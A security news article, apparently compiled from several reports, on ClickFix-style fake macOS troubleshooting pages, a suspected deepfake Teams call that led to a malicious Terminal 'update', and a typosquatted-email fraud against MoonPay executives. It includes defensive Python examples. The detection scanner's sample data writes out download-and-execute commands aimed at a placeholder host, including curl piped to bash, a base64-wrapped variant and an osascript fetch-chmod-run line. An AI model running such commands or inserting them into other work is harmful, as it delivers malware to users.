Attackers are posting fake macOS troubleshooting guides on Medium, Craft, and Squarespace. The goal is to make users run Terminal commands that install malware targeting iCloud data, saved passwords, and crypto wallets.
Microsoft’s Defender Security Research Team published the findings. The campaign has been running since late 2025. It preys on Mac users searching for help with common problems like freeing up disk space or fixing system errors.
Instead of offering a legitimate fix, the pages tell users to copy a command and paste it into Terminal. That command downloads malware and runs it on the victim’s computer.
The technique is called ClickFix. It is social engineering that shifts responsibility for launching the payload onto the victim. Because the user runs the command directly in Terminal, macOS Gatekeeper never inspects the payload.
Gatekeeper checks code signing and notarization on apps that a browser downloaded and tagged with the quarantine attribute, typically when they are opened through Finder. A script fetched with curl and piped into a shell carries no such tag, so the check never runs.
Attackers launched three campaigns with the same goal
Microsoft identified three installer variants: a loader, a script, and a helper.
All three harvest sensitive data, establish persistence, and exfiltrate stolen information to the attacker’s servers.
The malware families include AMOS, Macsync, and SHub Stealer. Whichever variant is installed, it first goes after iCloud and Telegram account data, then looks for private documents and photos under 2 MB, then extracts crypto wallet keys from Exodus, Ledger, and Trezor and steals saved usernames and passwords from Chrome and Firefox.
After installation, the malware displays a fake dialog asking for the system password in order to install a “helper tool.” The dialog is drawn by the malware, not by macOS, so a password typed into it goes to the attacker, who then gets full access to files and system settings.
In some cases, researchers found that attackers deleted legitimate crypto wallet apps and replaced them with trojanized versions designed to monitor transactions and steal funds.
Trezor Suite, Ledger Wallet, and Exodus were some of the main apps targeted in this attack.
The loader campaign also includes a kill switch. The malware stops executing if it detects a Russian keyboard layout.
Security researchers observed attackers using curl, osascript, and other native macOS utilities to run payloads directly in memory. This fileless approach leaves little on disk, which makes detection harder for file-scanning antivirus tools.
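The shapes described above (a curl download piped into a shell, a base64-wrapped stage, an osascript one-liner, a temp-file drop followed by chmod and execution) are what a defender can look for in shell history or process command-line telemetry. The following is an added example written for this page, not code from Microsoft’s report or from any of the malware families named; the sample command lines and the URL example.invalid are constructed, the regexes are generic shapes rather than the campaign’s actual indicators, and the keyboard-layout probe is one plausible way to implement the Russian-layout kill switch, which the report does not describe. The scanner also unwraps embedded base64 so a hit inside a decoded stage is reported with its layer.

```python
"""Scan shell command lines for ClickFix-style "paste this into Terminal" payload launchers.

Added illustration, not code from Microsoft's report or from any of the malware families
named above. The sample command lines are constructed; the regexes describe generic shapes
of curl/osascript/base64 abuse, not the campaign's actual indicators.
"""
import base64
import binascii
import re

# Generic shapes a copied "fix" takes. Names are this example's own labels.
PATTERNS = {
    # fetch a script and feed it straight to a shell: nothing is written to disk,
    # and nothing receives the com.apple.quarantine attribute Gatekeeper keys on
    "download_pipe_shell": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b"),
    # fetch to a temp path, then mark executable and run it in the same line
    "download_tmp_exec": re.compile(
        r"\bcurl\b[^;&|]*-o\s*(/tmp|/private/tmp|\$TMPDIR)[^;&|]*[;&]+\s*(chmod\s+\+x|sh|bash|open)\b"),
    # AppleScript one-liner, often wrapping a 'do shell script' or a password dialog
    "osascript_inline": re.compile(r"\bosascript\s+-e\b"),
    # base64-wrapped stage decoded and piped to a shell
    "base64_decode_exec": re.compile(r"\bbase64\b[^|]*(--decode|-d|-D)\b[^|]*\|\s*(ba|z)?sh\b"),
    # reading the enabled keyboard layouts: one plausible way to implement the
    # Russian-layout kill switch (assumption; the report does not say how it is checked)
    "input_source_probe": re.compile(r"com\.apple\.HIToolbox|AppleEnabledInputSources"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
MAX_DEPTH = 3  # stop unwrapping nested base64 after this many layers


def decode_printable_blobs(text):
    """Return the decoded form of every base64 blob in text that decodes to printable ASCII."""
    out = []
    for m in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            out.append(raw.decode("ascii"))
    return out


def analyze(cmdline):
    """Match the patterns against cmdline and against any base64 stages it embeds.

    Returns a sorted list of hit labels; hits inside decoded stages are prefixed
    'stageN:' so an analyst can see which layer triggered.
    """
    hits = set()
    layer, depth = [cmdline], 0
    while layer and depth <= MAX_DEPTH:
        prefix = "" if depth == 0 else f"stage{depth}:"
        next_layer = []
        for text in layer:
            for name, rx in PATTERNS.items():
                if rx.search(text):
                    hits.add(prefix + name)
            next_layer.extend(decode_printable_blobs(text))
        layer, depth = next_layer, depth + 1
    return sorted(hits)


def scan(lines):
    """Return [(cmdline, hits)] for every line with at least one hit."""
    return [(line, analyze(line)) for line in lines if analyze(line)]


# Constructed sample: what a shell-history or process-command-line log might hold.
STAGE = "curl -fsSL http://example.invalid/fix.sh | bash"  # hypothetical URL
SAMPLE_LINES = [
    "brew cleanup --prune=all",                                      # benign cleanup advice
    "sudo rm -rf ~/Library/Caches/com.example.app",                 # benign, if blunt
    STAGE,
    "echo " + base64.b64encode(STAGE.encode()).decode() + " | base64 -d | bash",
    'osascript -e \'do shell script "curl -s http://example.invalid/x -o /tmp/x; chmod +x /tmp/x; /tmp/x"\'',
    "defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LINES):
        print(f"{', '.join(hits):45s} <- {line[:70]}")
```

The benign cleanup commands produce no hits, the plain curl-pipe line matches at the top level, and the base64-wrapped line is reported twice: once for the decode-and-pipe shape and once for the curl-pipe shape found inside the decoded stage. Treat the labels as triage hints, not verdicts; legitimate installers also use curl-pipe-shell, so the useful signal is a match shortly after a browser visit to a troubleshooting page, or a match combined with an osascript password dialog.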
Attackers go after crypto developers
Security researchers from ANY[.]RUN discovered a Lazarus Group operation called “Mach-O Man.” The attackers used the same ClickFix technique, delivered through fake meeting invitations, against fintech and crypto organizations, where macOS is common.
Cryptopolitan published about the PromptMink campaign.
A malicious npm package was planted in a crypto trading project by the North Korean group Famous Chollima through an AI-generated code change. Using a two-layer package design, the malware reached wallet data and system secrets.
Both campaigns show that crypto wallet data is valuable. Attackers are adapting their delivery methods from fake blog posts to AI-assisted supply chain compromises to reach it.
A crypto founder had his laptop compromised when he joined what appeared to be a Microsoft Teams call with Pierre Kaklamanos, a Cardano Foundation contact he had spoken with before.
When “Pierre” reached out about Atrium and sent a Teams invite, nothing looked out of place. On the call, the face and voice matched what he remembered, and two other apparent foundation members were present.
When the call lagged and dropped him, a prompt told him his Teams software was out of date and needed reinstalling through Terminal. He ran the command, then shut the laptop off because the battery was dying, which in retrospect limited the damage.
He describes himself as “quite technically savvy,” which is part of the point: the attack worked because the context felt legitimate, not because the target was careless.
Social engineers have always relied on familiarity, and executing that at scale once required either a compromised account or weeks of text-based rapport-building.
The video call was the authentication layer, the thing victims learned to trust, and replicating it is now within reach.
Fake update
Microsoft documented campaigns in February and March 2026 in which malicious files masqueraded as workplace apps, such as msteams.exe and zoomworkspace.clientsetup.exe, with phishing lures that mimicked legitimate Teams and Zoom meeting workflows.
In a separate warning, Microsoft described “ClickFix”-style prompts targeting macOS users, instructing them to paste commands into Terminal and targeting browser passwords, crypto wallets, cloud credentials, and developer keys.
The fake Teams update fits both patterns simultaneously.
Mandiant said it could not independently verify which AI model, if any, generated the video, but confirmed that the group used fake meetings and AI tools during social engineering.
On Apr. 24, the real Pierre Kaklamanos posted on X saying his Telegram had been hacked and that someone was impersonating him, along with “a few other people in the industry this week.”
He told followers to avoid clicking links or booking meetings through the account and to verify contact through LinkedIn direct messages.
By then, the founder had already messaged the account suggesting they switch to Google Meet. Whoever controlled Pierre’s Telegram account replied that he had gotten busy and asked to reschedule, with the attacker still managing the persona once the call ended.
That exchange turns the incident from an isolated embarrassment into a live campaign signal: the method is active, the account compromise is the entry point, and the relationship history is the weapon.
| Stage | What the victim saw | Why it looked legitimate | What the attacker was likely trying to achieve |
| --- | --- | --- | --- |
| Initial outreach | “Pierre” reached out about Atrium and suggested a call | The victim had spoken with Pierre before, including on video | Reopen an existing trust relationship instead of starting from a cold approach |
| Meeting setup | A Microsoft Teams invite for the next day | Teams is a normal business workflow and the topic was plausible | Move the target into a controlled environment that felt routine |
| Live call | Familiar face, familiar voice, plus two other apparent Cardano Foundation members | The social context matched the victim’s memory of prior interactions | Lower suspicion and make the call itself feel like verification |
| Call disruption | Lagging, instability, then getting kicked out | Technical glitches are common in video calls | Create frustration and set up the fake “fix” as a normal troubleshooting step |
| Fake update prompt | A message saying Teams was out of date and needed reinstalling through Terminal | Software update prompts are familiar, and the user rarely used Teams | Get the victim to execute a malicious command directly |
| Command execution | The victim ran the command, then shut down the laptop because the battery was dying | The workflow still felt like a routine app fix at that moment | Launch the infection chain and gain access to credentials or device data |
| Post-call follow-up | The victim suggested switching to Google Meet; the attacker said he got busy and asked to reschedule | The persona continued behaving like a real contact after the failed attempt | Keep the relationship alive for another attempt and avoid immediate suspicion |
Why generative media changes the threat surface
The founder said he now believes the call may have involved AI-generated or manipulated video. There is no forensic confirmation of which tools were used; the OpenAI angle below rests only on what the company’s own safety documentation says about its models.
OpenAI launched its 4o image generation model on Mar. 25, describing it as capable of “precise, accurate, photorealistic outputs,” and released the ChatGPT Images 2.0 System Card on Apr. 21.
The firm stated that the model’s “heightened realism” could, absent safeguards, enable more convincing deepfakes of real people, places, or events. One of the leading AI labs has now put on record that its own image model raises the ceiling on what a convincing fake can look like.
The World Economic Forum said in January 2026 that generative AI lowers the barrier to phishing while raising its credibility, through realistic deepfake audio and video that can evade both detection systems and human scrutiny.
INTERPOL declared financial fraud one of the world’s most severe and rapidly evolving transnational crimes in March 2026, identifying deepfake videos, audio, and chatbots as tools that make impersonation of trusted people easier to carry out at scale.
Chainalysis data shows crypto scams reached $17 billion in 2025, impersonation scams up 1,400%, and AI-enabled scams generating 4.5 times traditional revenue.
Crypto attracts this class of attack because it combines high-value targets, fast settlement rails, and an informal communications culture in which Telegram introductions and ad hoc video calls between founders are routine.
Mandiant documented that the group behind the crypto Zoom intrusion targeted software firms, developers, venture firms, and executives across payments, brokerage, staking, and wallet infrastructure.
Mandiant noted that the victim’s data could be used to seed future social engineering, with each compromise generating material for the next.
Two paths forward
Zoom announced on Apr. 17 a partnership to add real-time human verification to meetings, a “Verified Human” badge, and a “Deep Face Waiting Room,” treating participant authenticity as a product problem.
In the bull case, that buildout reaches critical mass quickly enough that attackers must defeat multiple independent trust layers to complete a conversion, and the economics of impersonation campaigns deteriorate.
In the bear case, the timeline compresses before defenses do. Gartner warned that AI agents may halve the time required to exploit account takeovers by 2027, narrowing the window for human hesitation or security team intervention.
Deloitte estimated that generative AI-enabled fraud losses in the US alone could climb from roughly $12 billion in 2023 to $40 billion by 2027.
| Scenario | What changes | What stays vulnerable | Implication for crypto firms |
| --- | --- | --- | --- |
| Bull case | Verification tools spread quickly: human-verification badges, liveness checks, stronger internal trust rails, and more formal approval workflows | Informal founder-to-founder chats, legacy messaging habits, and ad hoc scheduling still create openings | Attackers face more friction and lower conversion rates because they must defeat several trust layers instead of one |
| Bear case | AI-generated impersonation improves faster than defenses are adopted; fake meetings and fake troubleshooting become standard playbooks | Public-facing executives, Telegram-based outreach, video-first verification habits, and staff under time pressure | Relationship hijacking becomes routine, and each compromise creates material for the next scam |
| What success looks like | Sensitive requests get verified across separate channels, with known numbers, shared passphrases, hardware keys, or pre-agreed internal systems | Social pressure, urgency, and trust in familiar faces and voices cannot be fully removed | Firms reduce the chance that one spoofed call can lead directly to compromise |
| What failure looks like | Teams rely on the call itself as proof of identity, even as deepfake and impersonation tools improve | Video remains persuasive even when it is no longer reliable as authentication | Crypto organizations become easier to target because executives are both high-value victims and reusable lure assets |
Every public-facing crypto executive becomes both a target and a lure asset, a source of voice recordings, video clips, and relationship graphs that attackers can deploy against the next victim.
Zoom is building liveness checks into meetings, Microsoft is documenting attack chains that impersonate its own software, and the FBI has warned that malicious actors are already using AI-generated voice and text to impersonate trusted contacts, advising against assuming a message is authentic because it appears to come from a known person.
Verification now requires independent rails, such as a known phone number, a hardware key, a shared passphrase established before any meeting, or a pre-agreed internal channel that no attacker has accessed.
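A shared passphrase is only useful if it is never spoken on the call being verified: a deepfaked caller or a hijacked account would simply capture it. The following is an added example, not a mechanism from the article or from any of the vendors it names, showing the passphrase turned into a challenge-response over a separate channel. Each side proves possession by answering a fresh, single-use challenge, and the answer is bound to a stated purpose, so a valid answer for “join the Atrium call” cannot be reused to approve “reinstall Teams through Terminal.” The parties, passphrase and purposes are constructed.

```python
"""Challenge-response on a passphrase agreed in person, before any meeting.

Added illustration; the article recommends the control but shows no mechanism, and
the parties, passphrase and purposes below are constructed. The passphrase is never
spoken or typed into the call: each side proves possession by answering a fresh,
single-use challenge sent over a separate channel (a known phone number, say), so a
deepfaked caller, a hijacked Telegram account, or a recording of a past call cannot
produce a valid answer.
"""
import hashlib
import hmac
import os

ITERATIONS = 200_000   # PBKDF2 work factor; a human-memorable passphrase needs stretching


def derive_key(passphrase, party_a, party_b):
    """Bind the key to the pair of contacts so a passphrase reused with someone else
    does not yield the same key (assumption: both sides agree on stable identifiers)."""
    pair = "|".join(sorted((party_a, party_b))).encode()
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), pair, ITERATIONS)


def new_challenge():
    """Random, single-use challenge; short enough to read aloud or text."""
    return os.urandom(6).hex()


def answer(key, challenge, responder, purpose):
    """Response the real contact computes. Binding 'purpose' means an answer obtained
    for 'join the Atrium call' cannot be reused to authorise 'reinstall Teams'."""
    msg = f"{challenge}|{responder}|{purpose}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()[:12]   # 48 bits: fine for one attempt


class Verifier:
    """Holds the per-contact key and retires every challenge after one use."""

    def __init__(self, key):
        self.key = key
        self.used = set()

    def check(self, challenge, responder, purpose, response):
        if challenge in self.used:
            return False              # replay of an earlier exchange
        self.used.add(challenge)      # retire even on failure: one guess per challenge
        expected = answer(self.key, challenge, responder, purpose)
        return hmac.compare_digest(expected, response)


def demo():
    """Walk through the scenario in the article: the founder challenges 'Pierre'
    out of band before acting on the 'reinstall through Terminal' prompt."""
    key = derive_key("constructed passphrase agreed at the last conference", "founder", "pierre")
    founder = Verifier(key)
    results = {}

    # 1. The real Pierre, holding the passphrase, answers correctly.
    c1 = new_challenge()
    results["real_contact"] = founder.check(c1, "pierre", "reinstall-teams",
                                            answer(key, c1, "pierre", "reinstall-teams"))
    # 2. Replaying the same (challenge, response) pair later fails.
    results["replay"] = founder.check(c1, "pierre", "reinstall-teams",
                                      answer(key, c1, "pierre", "reinstall-teams"))
    # 3. An impersonator with the hijacked account but no passphrase fails.
    c2 = new_challenge()
    wrong_key = derive_key("guessed passphrase", "founder", "pierre")
    results["impersonator"] = founder.check(c2, "pierre", "reinstall-teams",
                                            answer(wrong_key, c2, "pierre", "reinstall-teams"))
    # 4. A genuine answer captured for one purpose does not authorise another.
    c3 = new_challenge()
    results["purpose_mismatch"] = founder.check(c3, "pierre", "reinstall-teams",
                                                answer(key, c3, "pierre", "join-meeting"))
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:17s} {'accepted' if ok else 'rejected'}")
```

The point of the design is that the only secret is the passphrase, and it never crosses the channel under attack; what crosses is a 12-character answer that is worthless once the challenge is retired. The challenge must travel on a rail the attacker does not control, which is why the article’s list pairs the passphrase with a known phone number or a pre-agreed internal channel.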
Two top executives of MoonPay, a major cryptocurrency payments company, reportedly fell victim to an elaborate online fraud that cost them $250,300, according to a recent filing by the US Department of Justice (DOJ).
The filing, which seeks to recover 40,350 USDT (a stablecoin pegged to the US dollar) that crypto company Tether is holding in frozen accounts, refers to the victims only as “Ivan” and “Mouna.” Coverage from crypto outlet NOTUS suggests they are Ivan Soto-Wright, co-founder and chief executive of MoonPay, and Mouna Ammari Siala, the company’s chief financial officer.
The DOJ says that the two executives were scammed into moving funds to an account controlled by an individual they believed was Steve Witkoff, a high-profile US real estate developer and co-chair of President Donald Trump’s 2017 inaugural committee.
Blockchain data analysis indicates that the USDT was transferred to a wallet associated with Binance. The wallet is associated with Ehiremen Aigbokhan, a Nigerian citizen residing in Lagos.
The episode is an unusual public case in which senior industry players, with access to advanced crypto tools and security protocols, proved as susceptible to what investigators call a fairly simple form of social engineering as the average rank-and-file email user.
Scammer employed ‘insulting typo’ to imitate a public figure
Unlike crypto crimes that rely on hacking or on exploiting blockchain vulnerabilities, this scam was executed purely through deception: quiet manipulation of email.
The scammers used bogus email addresses nearly identical to legitimate ones, placing a lowercase “l” where the eye reads a capital “I” in the domain name; the two characters are almost indistinguishable in many sans-serif fonts. Here, the emails came from steve_witkoff@t47lnaugural.com and financersvp@t47lnaugural.com, addresses spoofing the names of well-known people and events.
This practice, a form of typosquatting that relies on look-alike characters, is common in phishing and has fooled even security-aware professionals.
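A mail gateway or a personal allowlist can catch this class of trick before a human has to notice it. The following is an added example written for this page, not code from the DOJ filing or from MoonPay. The trusted domain t47inaugural.com is an assumption standing in for whatever legitimate domain the scammers imitated; the two quoted addresses are the ones the filing describes, and every other sample address is constructed. The check goes beyond the single I/l swap: it reduces each domain to the shape a reader perceives (so look-alikes collide), then also catches one-character typos and a trusted name embedded under an attacker-controlled domain.

```python
"""Classify a sender address against a list of trusted domains, catching the
look-alike trick used in the MoonPay case.

Added illustration, not code from the DOJ filing or from MoonPay. The trusted domain
t47inaugural.com is an ASSUMPTION standing in for whatever legitimate domain the
scammers imitated; the sample addresses other than the two quoted above are constructed.
"""
import unicodedata

# Single characters that read as another letter at a glance. Illustrative subset
# (assumption); production code should use the Unicode confusables data.
CHAR_MAP = {
    "l": "i", "1": "i", "|": "i",   # the I/l/1 family behind t47lnaugural.com
    "0": "o", "5": "s", "$": "s", "2": "z", "8": "b",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",  # Cyrillic
}
# Character pairs that fuse into one letter in proportional fonts.
SEQ_MAP = [("rn", "m"), ("vv", "w"), ("cl", "d")]


def skeleton(domain):
    """Reduce a domain to the shape a reader perceives, so look-alikes collide."""
    s = unicodedata.normalize("NFKC", domain).lower().strip(".")
    s = "".join(CHAR_MAP.get(ch, ch) for ch in s)
    for seq, rep in SEQ_MAP:
        s = s.replace(seq, rep)
    return s


def edit_distance(a, b):
    """Levenshtein distance, for plain typos (dropped, added or swapped letters)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(sender, trusted_domains):
    """Return (verdict, trusted_domain_it_resembles). Verdicts, from best to worst:
    trusted, subdomain, lookalike, embedded, typosquat, unknown."""
    domain = sender.rsplit("@", 1)[-1].strip().lower()
    for trusted in trusted_domains:
        if domain == trusted:
            return ("trusted", trusted)
        if domain.endswith("." + trusted):          # mail.trusted.example: same owner
            return ("subdomain", trusted)
    for trusted in trusted_domains:
        if skeleton(domain) == skeleton(trusted):    # t47lnaugural.com vs t47inaugural.com
            return ("lookalike", trusted)
    for trusted in trusted_domains:
        if trusted + "." in domain:                  # trusted.example.attacker.net
            return ("embedded", trusted)
    for trusted in trusted_domains:
        if edit_distance(domain, trusted) <= 1:      # one dropped or inserted character
            return ("typosquat", trusted)
    return ("unknown", None)


TRUSTED = ["t47inaugural.com"]   # assumed legitimate domain, see docstring

SAMPLE_SENDERS = [
    "steve_witkoff@t47inaugural.com",        # assumed legitimate form
    "steve_witkoff@t47lnaugural.com",        # address quoted in the filing
    "financersvp@t47lnaugural.com",          # address quoted in the filing
    "ops@mail.t47inaugural.com",             # constructed
    "x@t47inagural.com",                     # constructed typo
    "x@t47inaugural.com.example.net",        # constructed embedding
    "x@example.org",                         # constructed, unrelated
]

if __name__ == "__main__":
    for sender in SAMPLE_SENDERS:
        verdict, ref = classify(sender, TRUSTED)
        print(f"{verdict:10s} {sender:35s} {ref or ''}")
```

Anything other than “trusted” or “subdomain” for a counterparty who is about to receive funds should route the message to a second channel, such as a phone call to a number already on file, before money moves. Note that the check protects only against domains you have enrolled as trusted; it says nothing about a brand-new sender, which is why the “unknown” verdict is a prompt for verification rather than a pass.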
“IP geolocation data consistently showed emails from these accounts originating from Nigeria, and not the United States,” the DOJ filing says. According to the authorities, Aigbokhan likely received the USDT through a scam involving an international money transfer into the US.
The con artists didn’t have to hack into or exploit the blockchain in any way; they only needed a ruse and a convincing pitch to steal the funds.
Wallet activity raises further doubts about MoonPay
The filing notes that one of the wallets involved in the scam is labelled as a MoonPay wallet on Etherscan, which suggests the affected individuals are indeed Ivan Soto-Wright and Mouna Ammari Siala.
As of press time, MoonPay has not yet publicly replied to requests for comment from multiple outlets, including The Block and NOTUS.
The timing of the case is particularly delicate. MoonPay, a widely used payment infrastructure for cryptocurrency purchases, had until recently offered its services in only some US states. Last month the NYDFS granted it a BitLicense, one of the hardest crypto regulatory licenses to obtain in the US and essential for doing business in the country’s financial capital; with it, the company can operate in all 50 states.
The incident may raise additional questions about MoonPay’s internal security controls, vetting processes, and executive oversight, particularly if the victims in this case had indeed used the official company wallets to conduct what seem to be personal or poorly vetted transactions.
Amid the boom in crypto adoption, the case is a sobering reminder that no one is immune to digital fraud, not even the executives of companies that help build the infrastructure of the crypto economy.